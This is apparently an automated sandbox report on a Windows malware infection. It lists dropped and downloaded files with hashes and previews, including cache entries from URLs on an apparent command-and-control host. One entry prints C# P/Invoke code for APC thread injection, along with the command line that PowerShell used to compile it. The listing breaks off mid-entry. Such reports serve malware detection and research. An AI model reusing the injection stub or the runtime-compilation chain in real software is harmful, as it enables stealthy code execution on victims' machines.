                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\F2uVhvn9[1].htm
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):338008
                                                                                                                                          Entropy (8bit):5.999869391852298
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:X36/dI+cmFqVRwgq2o/JG/IRKIyyCmZm/hKC2Ny5vWb1OB/sQx2IKtA4QMO:a/dINmGREBXE3mUIC2nXc2IKW4Qp
                                                                                                                                          MD5:03D61BB1F49164FA9812A5E896C67F3E
                                                                                                                                          SHA1:85FA697A67481A5631B61FB3F539B4503B929EA1
                                                                                                                                          SHA-256:CDE50C5D8FC8B941FD19E1F70B357635061FBFE6F9A0D5BD4C0CFD9F46BF8436
                                                                                                                                          SHA-512:04E6947E4C892007BD46F9FAA52D9B792892A929AFDCD2797091F54EC65D2822366F0A0743EB20B9E1497B08E164F5DB194010186D31B65831CB9C839A71C784
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9
                                                                                                                                          Preview: ix+4zopyS5Zb1yhQYCwOCVX8cdmxlByXC8UyxeQK0zznJlDVK9Oxl8Rq1F05vsKoIReV9UZOLSxZ1jvHDnCVs4gT5YM0PY/Ugn/E4Q8lv7AbuXQNF919sT99Z5qQ5oLVwLPRJJjRaRs8w0Yb0L/FMjrqCAAQ3HHRoRJfEqVsmy5BRYhbJLTGlFiHAEQ6mXalmlkwlt1V9HFEZuG/O3LXXsAkNj9dgUwDEpOLhnTxRp0/XP3bIxs5gyKVhVPYphhfmr1dJrkKxo9a9/c5ibgljvaI/GdZWjwqqgLrhaQonD3/o9AhWMu2xZ3yXsA08eboPRIQXj9zOicR/ip6PtDVocwDkwimC+ACJ5uobFopja2yO3cVeiF2xJSzHxvccwII9EZFEhWpEavbPx/D4ZXg7YtbEbDoX1VWryX4fAcx9V7ZRJ3UrvXA0H4IzCvfoAvhXe9wu6gfxLWXaY0C47fRrcxJjFl5JJR0UMzb3bqE6I2qE0tF0H0UZ+Vr6+esPmFbLzjErDldhK8LrgEtO2y3wS82DKjypVmH68MYEedt1I1yssNAzaZbnlvrIs+r0sjCOUKrzhQlwWuIPbL7oJ+VeR5elHyyhnRFAsymKu8YMOJDEiqfqfUsosgV/OEm+kBstS7l8o+OlOdP67DLUNUjCZGHiG1Xdfxqwy7QePTlH5zKfmx7hucr/wDCYhWv9EGLpytc3Jt28tLKqXhrYFnInjBO84x8ZQEuaaj/QPUhqZbdulImaf/JkFslNxOrJh8NdV6/MN5noGp0Pepmur7ldmdzCM+WPkKW9EvlABimnJDYbt0QfkSKdAcHbCdchWLWVhDruMAn1GBH7Rx3kzUYBu3gK2CEIqq7n+EJuq9Yz4k/9IAXAiodT7OVSgOxcp34CPUsmkb8Rvqcu8dfndVOdARDUt1yXb2hBgteYrxc4Suuo59wOMPeYFueTpxivJQwKwAu9wu+I5z40daKVd6r4iwA0WExliDIbKfkWB+/
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\x[1].htm
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):267700
                                                                                                                                          Entropy (8bit):5.999836336819629
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:LO9BcSK5cnihVRakwHDgwodbX+Un+IQ7fqjeMRmd1:LkLn8VRl1woVX+2RQrtBd1
                                                                                                                                          MD5:FC226C805B21348897F9CF750630EBA6
                                                                                                                                          SHA1:5F20971E026402B862B9A62A6B4CCCE997BFE90E
                                                                                                                                          SHA-256:B2BA15FFD15238328B301C92BC4CB4CA7C5B500826146DBFACB98B261E12FB31
                                                                                                                                          SHA-512:CC7D68BC7D29F45BBC9152AA9D360263B8F56675ED71C273C7750D9B268DF99A72C0B8CC2F0D2A1881784750D05CA8ABA9C5DA52393BA9AE27A2338F6EB13E2C
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://api10.laptok.at/api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5BLSfzDcwZ/ysqT6z8HrNKuO4fXY2/irkbAVdTo/RWbe52iH3Xq4g9HSy7T_/2BHlZ1AsqHp_2FSVhhH/PxISPyARHHBu9cqf2asVrk/B_2Bc5UErTgzq/aCeRep61/u3_2FPbPYGS0j_2BswbxUjP/8O28iXtkQz/aylOZngYJ0Xllf6WM/vy7yYAtFEJkB/5_2Baz4XbSv/er1JYCD_0A_0Dl/I8i2hrmb1zaiul1kG_2Fy/aiVGniqis6o2FPCg/GwUZMZCTuQ9eNWU/_2FZB6xpAK/f1KMxZbb/x
                                                                                                                                          Preview: bCDmG56/ZGJCnK57yB48316E1AwMxoZFpLJ/fL6RyHH6z8WWxfeP5zslI9nQJixRoABWeyYOh+QvmbbTogob9cq/3ayFjfEgr8iqVOjarjeS13gakZSlB5kYToxRul+cKcG5DoKRCFpia5IoNTX/cqQdxLTX41TXxNTjfFlnpJy88JrJLpXK8HMnRefEmshmLublL1L0nsQPylestSsciJS4KMnnDn0t/jzqFb9ej9iKhd58CiFPMmaQChq0SoL+BzPjSp20D5BFf3ayIVCFQp+I9tuN8q8q7hIJ6FpBcNvutQ3KX6863HQhKvpXkBrepMOcF0FYtvC9Tc/wFS+d6pmVVTf/ujpuwmI8HJSCQAj4JXtM7YpFLj87pnV0ijP+L+oF/AVd55puLadVfoxK+Is6XbJeLxCrgEBb/QWaL6SV8HBpDcQEPrcYDOznjDm8ATNlzK86vGAKxBfH8CiNw6qIaInwrJQ/rOIErZGDkTtyKGrvAkaHqg76KhBAiQ3BNn+H1nU27D0pO/KA58JS+10MCKOY31FWx9CAHcHarDnvbRnk0WTqje/i4QbODSp8g6XJuaa95ltgYOKbGxadZQ9IfFNVrSEwxRqYkBZcnGu2EtpWpC1Ks/fYLJOX/z1lelzjN5PluvEWV2H60wq06JnJl85dFWDBfcTjv/sS837YVzTtI1wae22Xzk2wERnobGvULJhD1FNbylgTCyH9UCS2Cq/NUzEARHSOZCnYB7woyDdlFIAbMHBkwHJV23NKATjqITLAkmobXJXh/zEItrLapPklZsumwXAolxOqgaRl9EmartlkRMjScYA6AtZSBcSgzDAxgZtyTr3kQQJscv4qgSjhVDW8kWO66xm8u/3H7SS/LXh3BryRRetoELZcetKWzVRTXAeeTiDajUn/ke8Gp7ra1aSdTNW/jhrUJ8UANKS4hUiafZ8HDBpR38v24/ZL4Db0DER2nJm+aHTEIBw66My91kYg1Xh6UlvK
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):11606
                                                                                                                                          Entropy (8bit):4.883977562702998
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                                                                                                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                                                                                                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                                                                                                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                                                                                                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):64
                                                                                                                                          Entropy (8bit):0.9260988789684415
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                                          MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                                          SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                                          SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                                          SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: @...e................................................@..........
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.0.cs
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):402
                                                                                                                                          Entropy (8bit):5.038590946267481
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
                                                                                                                                          MD5:D318CFA6F0AA6A796C421A261F345F96
                                                                                                                                          SHA1:8CC7A3E861751CD586D810AB0747F9C909E7F051
                                                                                                                                          SHA-256:F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
                                                                                                                                          SHA-512:10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):369
                                                                                                                                          Entropy (8bit):5.190216598085259
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fUIcuLB0zxs7+AEszIWXp+N23fUIR:p37Lvkmb6KH8IcuLGWZE88IcuLb
                                                                                                                                          MD5:24BE68FFF8EAA55D3C33C00303B73669
                                                                                                                                          SHA1:3B60675D2F1C66F56C169FE73B0077E524E61C30
                                                                                                                                          SHA-256:88DB8DE76BD31E11E87287F28B3545CDCD4DCEA3A16DDB91A89C064BE5239708
                                                                                                                                          SHA-512:803599C04897A15448DBE0A8E5B09495EFB338028DFC337CE83C795A54F905603C11E97851A2D0F648E4A9243559D2D727A6DB75AEE2D7ECB249F1AF5DF576BA
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.0.cs"
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.dll
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3584
                                                                                                                                          Entropy (8bit):2.6017371333042956
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:etGSl/W2Dg85xL/XsB4z2tL4zqhRqPPtkZfw7Jn+II+ycuZhN/lcakSmlxPNnq:6IWb5xL/OfbuuJC9n1ulya3Gq
                                                                                                                                          MD5:E7B23700D8DBED4C15449B550BC621C7
                                                                                                                                          SHA1:B48EE8E597ABF16BDC44BFEA58993B639C197EE0
                                                                                                                                          SHA-256:196BD4C06808ED7E436BC2BF98522415E8DAD44C86A784A1D7A070EEA32CF81D
                                                                                                                                          SHA-512:65B1C6660468591FCDC28A3501D7CCB08D49C24808C5685A84A4022C31BB1A72CF819F4B150CDFC9DCC75C4307C39D52908DDE91A8D62F220654490B6BC924D8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V6._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a.......*.....3./.....6.......C.......V................................................<Module>.1b1iaete.dll.tba.W32.mscorlib.Syst
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.out
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):412
                                                                                                                                          Entropy (8bit):4.871364761010112
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:MSVC .res
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):652
                                                                                                                                          Entropy (8bit):3.0771840022658674
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFlcak7YnqqmlxPN5Dlq5J:+RI+ycuZhN/lcakSmlxPNnqX
                                                                                                                                          MD5:71BD86730A14259922C6CE17D85643B2
                                                                                                                                          SHA1:44DDB11E6A34390B91825C2335145DE939E3D22E
                                                                                                                                          SHA-256:A76332733CC299074CA37F8E1E3A46C5534DDCC0DBA737992B1985D09D13AA87
                                                                                                                                          SHA-512:E854C3757F6767FDA5CEB4973F89B3D29BF804A319F21B373A569B2B107D82C14D9648249B968D29A264507D20B35ED46E46E0DD697614471D371EFF6BD60102
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.b.1.i.a.e.t.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.b.1.i.a.e.t.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                          C:\Users\user\AppData\Local\Temp\Ammerman.zip
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):41922
                                                                                                                                          Entropy (8bit):7.9900732828260255
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:768:iPRP7HHNs72bLXJnkNQmgOAhghqgwZJTpT/6gKffcvv7ovDTvxfz:GRP7HnbLZkGLOKBJT2ffhvvxfz
                                                                                                                                          MD5:94F926A14F611ED85B2AD7F5C108D930
                                                                                                                                          SHA1:920C9F8B4B8100DEDA928646DBFABA7D8E7AA6DE
                                                                                                                                          SHA-256:BA9979A733F1226AD56803023880155FECAAEDAB7ABB4DC9552BD674D47FE62F
                                                                                                                                          SHA-512:3DD6E4E6381AC5128860FF102E4CD3625E5BB621A077CD367231BD8FB49CD9BE09C0DF0C2AC7EAD62015DE95C446904124041460555A78225ACB2D72DD8DC506
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: PK..........rQ.}..............earmark.avchd..8..8N.$....![Hb.bl!..k...C.2.o!..|J......e.%F..Ra.......W}...s~../.u.......y....{...~............8.vv..4...h...?a.`.50...:._._.............8......8....y.`......p........0...@.@.j....{4:..~zz}.=`...M.? .G:..<.#.......u......._0.L.|4z..,.wJ.............r.:...-.?....::.ig.u4......t.t....G...A.......?.j......a.7...F..1#.f...K.N_N..{...4|9...v.X....3..&6:3.T-...:.1.lf.9.F;{..3........o....t2tt..@|....^.:..;..............`.`~....v..54....K.......c....p..K.DX..{4B.].,..a...P.h9....F#H.:..}hM.(.I.WS..Fk^...;H..o.Wc..2..H_...X..u.<....X....Pg.$.g,.~.O.+.s.dI.=.D.1.6.!....9..<6Z....b.h...0>s..*...$..v...N.I...'.S.........G.qck._.k.:....j.N..........K...x..Mk....#ugE...G....R..G...%.d!mk.d.._..."l...>P.3......S.....<....Ws..!.......f.L.$.$.e:.U3.H.T.$.......h-{.ag.}...%D..^.H0.....Z........j.......h.J.G....o......`.d.ee..8y.s../...V......=wm...aT+..&...e+.p_....m8gz9...|..W.h,...2.Q..N.L.......?"..<.@7W.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\FCC.cxx
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32
                                                                                                                                          Entropy (8bit):4.413909765557392
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:4EA3ppfn:4LZx
                                                                                                                                          MD5:1F1A0E8B8B957A4E0A9E76DAD9F94896
                                                                                                                                          SHA1:CC1DDD54FA942B6731653D8B35C1DB90E6DBBD34
                                                                                                                                          SHA-256:D106B73E76E447E35062AE309FE801B57BBEE7AC193B7ABCF45178ADA7D40BB3
                                                                                                                                          SHA-512:10505ED4511DC023850C7AB68DDCE48E54581AAC7FD8370BAFE3A839431EFC2E94B24D3B72ED168362388A938348C5216F1199532D356B0F45D2F9D6B3A2753E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ZWJmCemKPVQNwvupbUKEMAALZhNPjPJb
                                                                                                                                          C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):89
                                                                                                                                          Entropy (8bit):4.384574622669155
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:oVXVPi9tgU48JOGXnFPi9tgpSun:o9YtgU4qotggu
                                                                                                                                          MD5:C1997D9C943C96D25A824762561C6091
                                                                                                                                          SHA1:E9AFB5B3FD6918A84B3053CFB4C4B8BCE8C4EEAC
                                                                                                                                          SHA-256:0878B5DD91030DB7F7048540F545EA9CEA892AEA144AA907C411F7184CAAAF65
                                                                                                                                          SHA-512:9ADBF60FC0FAFBE6994BE2596F2437D584D4ECEAE2A186A0A6311DF4E02626B013846B9E98D9E39E011BD2855367203451AA6D96DF40C8060647884444A71484
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: [2020/11/20 13:33:54.306] Latest deploy version: ..[2020/11/20 13:33:54.306] 11.211.2 ..
                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES3556.tmp
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2184
                                                                                                                                          Entropy (8bit):2.6994186263112407
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:bP7FGghHGhKdNNI+ycuZhN/lcakSmlxPNnq9qpje9Ep:bPBcKd31ulya3Gq9A
                                                                                                                                          MD5:A64A8B609CA0B334D081D3E3B2294AA5
                                                                                                                                          SHA1:AD2C4D227D5DE9E14B7409D21F1D065375AF95A0
                                                                                                                                          SHA-256:A48B4631C2EFCB751DEEA797CB80CBF0DFE4007419F427646C7544B62B98088B
                                                                                                                                          SHA-512:D37C8F1D7C9D22F7099F287DBA250F0A3FC2D80318EE536F6B4E8CC85A2853864F49FE030B1048EFCC81E586FB50A5836AE7BD47A7F49B6FD3B7F0E03DF1A20C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ........S....c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP................q..s..%."....VC...........4.......C:\Users\user\AppData\Local\Temp\RES3556.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES45E1.tmp
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2184
                                                                                                                                          Entropy (8bit):2.711876922400887
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:bPXYfhHyuYhKdNNI+ycuZhNbakSdPNnq9qpmMe9Ep:bPKSzKd31ulba3Hq9Vy
                                                                                                                                          MD5:602FB8B3CB63B5AA78B20C9170F13596
                                                                                                                                          SHA1:4B4E2DC98B88F5349A39F00FCA92241E746A9AA3
                                                                                                                                          SHA-256:70D0413F1433D1786CAC910E7403BDD7898EE44B49AFB54332E3F1C271026CF0
                                                                                                                                          SHA-512:F6961DFD968F487E8587B5B94B204264E18F174D233B6271E65C248DA6C6B9CD271B774715C391DB19A6BCC83B6888931EC43D372FBB0146BB106BC2722E5DCF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ........S....c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP..................4.P.J................4.......C:\Users\user\AppData\Local\Temp\RES45E1.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\Tolstoy.3gp
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):24
                                                                                                                                          Entropy (8bit):4.136842188131013
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:L0a3dGn:AOGn
                                                                                                                                          MD5:DE116F46B1AB756FE5FC714826D9C77C
                                                                                                                                          SHA1:C0543E108146A86E97F9C92D84550415FF0D07F6
                                                                                                                                          SHA-256:B83A7A9918FBC774A1CBF2D5C700D86B64D91961728A7BBEC91FF74CE27C6CBA
                                                                                                                                          SHA-512:FFA07A13C6527B966AB311853D6FF493D9F9EF7B22A530DD52FE06CF41D43880A310F39826DD1D6ED24A54C8C4E0A70E4E2073F52B01BF045715F60833F02FE8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: thzQhBrCvRRGaQnmDrodlryY
                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh5pn2oo.e51.ps1
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 1
                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeee2m1p.fyr.psm1
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 1
                                                                                                                                          C:\Users\user\AppData\Local\Temp\adobe.url
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):108
                                                                                                                                          Entropy (8bit):4.699454908123665
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                                                                                                          MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                                                                                                          SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                                                                                                          SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
